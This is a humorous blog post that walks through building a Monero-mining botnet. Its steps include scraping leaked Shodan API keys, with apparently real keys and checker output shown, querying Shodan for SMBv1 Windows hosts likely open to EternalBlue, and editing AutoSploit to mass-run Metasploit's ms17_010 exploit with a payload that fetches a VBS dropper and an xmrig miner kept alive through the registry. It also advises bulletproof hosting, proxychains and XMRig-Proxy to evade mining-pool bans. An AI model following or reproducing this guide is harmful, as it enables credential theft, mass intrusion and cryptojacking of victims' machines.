That XMR is MINE!

Accurate portrayal of me mining XMR

Who doesn’t want to be rich? Imagine being able to buy all of the My Little Pony Ultimate Equestria Collections in the world?

My Little Pony Ultimate Equestria Collection

Now that’s the dream! Well, a couple months ago I took it upon myself to find a clever way to become the next big millionaire. Currently, my only source of income is Bug Bounties. Becoming a millionaire through HackerOne and BugCrowd would take quite some time, and I wanted every single My Little Pony Ultimate Equestria Collection NOW! It’s very rare that someone becomes a millionaire overnight, but it is possible and has happened (Just kidding, I have no idea what I’m talking about, I haven’t even Googled it yet).

In fact, here are some real-world examples

Every single one of those human beings worked hard for their money, or obtained it via chance/luck. That’s just capitalism, but what if there’s another method to becoming a millionaire overnight? Something that requires no effort (Okay, maybe a little) whatsoever, and pays off well…

Stealing!!!

Me robbing Bill Gates

No, not that kind of stealing…

Me hacking Bill Gates

That’s right, hacking. The best form of theft (Just kidding, don’t steal), since there’s no physical aspect to it. Any advanced hacker can target some rich old white man and try to pwn his bank account, but that’s too risky in this day and age. Assuming our goal is to make 1 million dollars, that’d be too much money to pull off the operation without setting off any alarms. Not to mention the fact that stealing that amount of money would probably overwhelm me with pure guilt. What if we could steal something else? Not money, but resources

Photo of my Super Computer

If it isn’t clear to you yet, I’m referring to crypto-currency mining. Usually you’d mine on your own machine, and get rewarded for your computations, but that reward is usually close to nothing depending on your mining rig. Bitcoin is mined with primarily GPU’s, both of which are very expensive and power intensive. So, if you want to make more than a buck in this field, you’re gonna need some serious horsepower. Not many computers have powerful GPU’s and sometimes no GPU at all, but every single computer has a CPU, powerful or not. So if we wanted to target machines by the mass, mining on a CPU would be our best bet. For this, we’ll use the crypto currency known as Monero (XMR).

Monero (XMR) is an open-source cryptocurrency created in April 2014 that focuses on fungibility, privacy and decentralization. Monero uses an obfuscated public ledger, meaning anybody can broadcast or send transactions, but no outside observer can tell the source, amount or destination. Monero uses a Proof of Work mechanism to issue new coins and incentivize miners to secure the network and validate transactions.

It’s completely anonymous, compared to BTC which is pseudonymous.

You’re telling me I can mine this crypto-currency on essentially ANY computer and stay anonymous at the same time? Sounds like the perfect coin for a botnet mining.

We know what coin to use for our super evil botnet, but where do we find machines we can infect? This is the tricky part. There’s tons of vulnerable devices out there, in fact I believe everything is hackable if its connected to the internet, with enough time and dedication. We can use several tools for this and find devices vulnerable to popular CVE’s. The ideal exploit should align with the following for maximum efficiency of the botnet:

  • Easy to automate
  • Quick
  • Targets semi-powerful machines
  • Big attack surface

After some research I came across this article: https://www.proofpoint.com/us/threat-insight/post/smominru-monero-mining-botnet-making-millions-operators

Someone had won the race to a million dollars via an XMR Botnet…

Me when I'm angry

This was disappointing at first, but it got me thinking about two things:

  1. This was already really popular, which increases the chances of getting caught.
  2. Anyone can replicate successful botnets, with minimal effort.

The CVE these hackers were using was CVE-2017-0144 aka EternalBlue. It seemed ideal for the operation, hence their significant amount of earnings. Lets try and replicate their botnet and make ourselves a million dollars baby! (Hypothetically, of course…)

IM RICH BABYYY

Gathering our Targets

There are two methods we can use to gather our targets. Shodan or ZMap.

ZMap

Pros:

  • Absolutely Free

Cons:

  • Self Hosted
  • Requires High Speed Internet
  • Requires ZGrab for Headers
  • Manual Parsing Required
  • Scanning the internet from scratch
  • Re-inventing the wheel

Shodan

Pros:

  • Online Service
  • Provides an API for programming languages and a CLI tool
  • Search Filters
  • Real Time Data Streaming
  • Honey Pot Detection
  • DB of the entire internet, at the touch of your fingertips
  • Okay we get it, Shodan is better…

Cons:

  • Costs up to $900

Clearly Shodan is better, but it’s really pricey. We’ll need at least a million targets for our operation since not all of them will be vulnerable or online. If we look at Shodans website for the price of the Small Business plan:

Too expensive 4 me...

I’m not a millionaire yet, so I’ll pass on that offer, but I am a hacker. Finding a paid API key shouldn’t be that hard. People always leave their API keys in source code and upload them to the internet not expecting anyone to find it. I Googled “Shodan Python API Example”, clicked on a relatively popular one and then looked for the variable containing the API key:

import shodan

SHODAN_API_KEY = "insert your API key here"

api = shodan.Shodan(SHODAN_API_KEY)

Now we just Google that variable name with quotation marks and look for idiots who have pasted their API keys online:

Yay, a key

If we throw that into Shodan’s CLI tool and check how many queries they have left:

frinto@pwnie:~$ shodan init 9xR76NYbEXhXFRwrXYdREGs18i1HvaqF
Successfully initialized
frinto@pwnie:~$ shodan info
Query credits available: 100
Scan credits available: 100

Crap, that’s no where near enough. After 5 minutes of manually checking keys with 0 query credits and invalid keys, I decided to make my method of finding keys more efficient. Regex Scraper allows you to scrape a sites source code and show all matching strings for a given regex pattern. \b[a-zA-Z0-9]{32}\b is the regex pattern for a Shodan API key.

Yay, more keys

Bam, now I just tabbed through all of the pages for my Google search and copy-pasted the keys into one huge text file. Alot of them were duplicates and also false positives, so I decided to automate the checking proccess with a script. Fortunately for me, there was already a tool for this on GitHub.

frinto@pwnie:~/documents/tools/shodan-api-checker$ python2 shodankeys.py keys-2-test.txt 
{+} Testing Key: 9xR76NYbEXhXFRwrXYdREGs18i1HvaqF
{+} Key 9xR76NYbEXhXFRwrXYdREGs18i1HvaqF appears to be valid, and bonus, paid!
{+} Testing Key: Ld4jdENSFPTWdboKv2wodf82RWjtPNLs
{-} Key Ld4jdENSFPTWdboKv2wodf82RWjtPNLs is invalid!
{+} Testing Key: SkVS0RAbiTQpzzEsahqnq2Hv6SwjUfs3
{-} Key SkVS0RAbiTQpzzEsahqnq2Hv6SwjUfs3 is invalid!
{+} Testing Key: cB9sXwb7l95ZhSJaNgcaO7NQpkzfhQVM
{*} Key cB9sXwb7l95ZhSJaNgcaO7NQpkzfhQVM appears to be valid! Not paid for though!
{+} Testing Key: q9uXeVpnUUoJ44huOovdbm6qAetKG8fR
{-} Key q9uXeVpnUUoJ44huOovdbm6qAetKG8fR is invalid!
{+} Testing Key: bkVtPXLMjrmxBsxllU1X6uNgKb45zeHP
{-} Key bkVtPXLMjrmxBsxllU1X6uNgKb45zeHP is invalid!
{+} Testing Key: q9uXeVpnUUoJ44huOovdbm6qAetKG8fR
{-} Key q9uXeVpnUUoJ44huOovdbm6qAetKG8fR is invalid!
{+} Testing Key: bkVtPXLMjrmxBsxllU1X6uNgKb45zeHP
{-} Key bkVtPXLMjrmxBsxllU1X6uNgKb45zeHP is invalid!
{+} Testing Key: wfGupwtAM1gvSaz2pgeb5fpheHdvAEtY
{-} Key wfGupwtAM1gvSaz2pgeb5fpheHdvAEtY is invalid!


{+} Acquired 2 valid keys
{+} Acquired 1 paid-keys
{+} Acquired 1 community-keys

{+} Paid Keys...
9xR76NYbEXhXFRwrXYdREGs18i1HvaqF

{+}Community Keys...
cB9sXwb7l95ZhSJaNgcaO7NQpkzfhQVM

This is just an example with 2 API keys I found, but long story short I found a key with 180,000+ query credits!

frinto@pwnie:~/documents/tools/shodan-api-checker$ shodan info
Query credits available: 183932
Scan credits available: 65536

Shodan query credits are equal to 100 results per credit: 183932 * 100 = 18393200

Yay, AN EXPENSIVE KEY!

This key gives access us 18,000,000+ IP addresses. Not that we needed that many, but it’s still a good find. Now onto counting our potential targets. We can use Shodan’s count feature for this.

frinto@pwnie:~/documents/tools/shodan-api-checker$ shodan count "vuln:CVE-2017-0144"
0

WTFFFF!!!

Shodan isn’t tagging devices vulnerable to CVE-2017-0144 because it’s not possible to tell if a system is vulnerable via a header, but rather an actual PoC for EternalBlue. This means, we’re going to have manually narrow down machines that are potentially vulnerable to CVE-2017-0144:

frinto@pwnie:~$ shodan count 'port:445 "SMB Version: 1" os:Windows !product:Samba'
977080

Nearly a million devices are potentially vulnerable to EternalBlue, great. Now lets download all of the IP’s.

frinto@pwnie:~$ shodan download --limit 1000000 pwnable.json.gz 'port:445 "SMB Version: 1" os:Windows !product:Samba'

Once they’re all downloaded, which could take hours, we need to parse the GZip file and output only the respective IP addresses:

frinto@pwnie:~/documents/tools/shodan-api-checker$ shodan parse --fields ip_str pwnable.json.gz > ip-list.txt
frinto@pwnie:~/documents/tools/shodan-api-checker$ cat ip-list.txt 
104.206.17.81
212.227.248.250
185.25.20.45
138.201.16.68
23.94.226.133

We now have a text file of every single device on earth that could be potentially vulnerable to EternalBlue, it’s exploit time, or is it…?

Like a bossss

Bullet Proof Hosting

We’re going to need to host our distributer(s) right? This calls for some BPH (Bullet Proof Hosting).

Bulletproof hosting is a service provided by some domain hosting or web hosting firms that allows their customer considerable leniency in the kinds of material they may upload and distribute. This leniency has been taken advantage of by spammers and providers of online gambling or illegal pornography.

Basically, we can’t just use any hosting service for our operation. This requires something more discrete. We have three options here:

A. Hosting service that advertises itself explicitly as BPH, commonly found on Dark Web markets

B. Cheap Hosting services from Russia or third world countries that don’t fall under certain internet regulations

C. Hosting services like GCP, AWS, and Digital Ocean offer free trials that can be abused

Either of these work fine, but option C will be risky due to the fact that getting banned is a factor. Option A is the most costly since it’s explicit BPH. Then you have option B, which isn’t free, but it’s affordable and getting banned isn’t something to worry about. Once we’ve chosen our hosting provider, we can SSH into it, but remember…don’t ever use your actual IP. Throw those proxy chains on!

P.S. - In a real world scenario, it would be best to obtain multiple servers and have them all distribute the malware for your botnet equally. That way it’s significantly harder to identify the actual location of the attacker.

Exploitation

There are endless possibilities when it comes to spreading your XMR mining malware. To cut to the chase, the method I used was utilizing a tool named AutoSploit. It automates metasploit for mass-exploitation. Using this tool we can iterate over every IP address in our text file, and run exploit/windows/smb/ms17_010_eternalblue on the target. I’m not going to explain the setup process of AutoSploit, since there’s already tons of documentation on it. Import your hosts file, and exploit/windows/smb/ms17_010_eternalblue as a custom exploit file, and then run AutoSploit. You’ll quickly realize that by default, AutoSploit only takes an LHOST and an LPORT as arguments for your workspace. This means we’ll have to edit the source code and make it set the payload to windows/exec instead of generic/shell_reverse_tcp. We can change this in the lib/exploitation/exploiter.py file:

                    # What's the point of having a workspace if you overwrite it every fucking time...
                    rc_script_template = (
                        "workspace -a {workspace}\n"
                        "use {module_name}\n"
                        "setg lhost {lhost}\n"
                        "setg lport {lport}\n"
                        "setg verbose true\n"
                        "setg threads 20\n"
                        "set rhost {rhost}\n"
                        "set rhosts {rhosts}\n"
                        "run -z\n"
                        "exit -y\n"
                    )

Remove the LHOST and LPORT from the rc_script_template variable and append setg payload windows/exec and setg CMD {malicious_payload_here}. Ideally in a real world scenario {malicious_payload_here} would be fetching an attackers VBS script, and then executing it. This VBS script then downloads an XMR miner, like xmrig and a BAT file which starts the miner with their wallet address and mining pool as command line arguments. Keep in mind this is all done in the background as well. To make the miner persistent, the attacker adds the BAT file to the registry for login execution. The BAT file would also check to see if the system is 64 or 32 bit before fetching the xmrig binary.

BUTTTTTT

Hold up....

Luckily for us, this is all hypothetical and I don’t actually have to do all of this. For a PoC, we can simply ping our machine and see if it gets a ton of ICMP requests. Clearly, if you’re targeting that many machines, you’re bound to get a ton of ICMP requests.

Anyways, back to our hypothetical talk….

Mining Pool Restrictions

You’re going to have to mine with a pool if you want to make anything profitable. I mean, any outcome is profitable in this scenario since it’s all free, but you know what I mean. We want to be millionaires! The thing is most mining pools DON’T allow botnets. So, how do you hide your thousands of clients and prevent getting banned from the pool? We’ll use MineXMR as an example, since they have a strict botnet policy. The tool XMRig-Proxy allows you to tunnel your clients/hashrate and make it appear as one single client to MineXMR. This eliminates any botnet accusations and keeps you safer from bans. Now you can watch as you dominate the number one spot on MineXMR!

Finally, we’re all done. We can sit back and relax.

Time to check our wallet…

frinto@pwnie:~$ xmr-wallet 
Current Balance: 98349839 XMR

YES!

Written on July 16, 2019